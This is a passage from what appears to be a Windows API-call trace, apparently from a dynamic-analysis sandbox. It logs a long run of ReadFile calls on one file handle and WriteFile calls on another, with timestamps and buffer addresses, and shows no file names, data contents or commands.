nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.332] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x37a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.333] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.333] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3de, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.334] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.334] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.335] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.336] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.336] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.337] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.337] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.337] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.338] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.339] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.339] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.340] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.340] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.341] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.341] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.342] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3f4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.342] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.343] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.343] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.344] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.344] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.345] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.345] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.346] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.346] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.347] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.347] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.348] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.348] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.349] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.350] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.350] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3b8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.351] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.351] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.352] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.352] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.353] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.353] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.354] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.354] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.355] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.355] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.356] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.356] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.357] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.357] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f6, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.358] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x32d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.359] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.359] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x389, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.359] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.360] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.360] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.361] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.362] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.362] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.362] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3f9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.363] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.363] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.365] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.366] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.366] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.367] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3c9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.367] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.369] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.369] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.370] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.370] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.371] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xc7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.372] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3f4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.373] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x82, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.375] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.375] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.376] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.376] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.378] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.378] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.379] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.379] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.380] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.380] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.381] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd350, 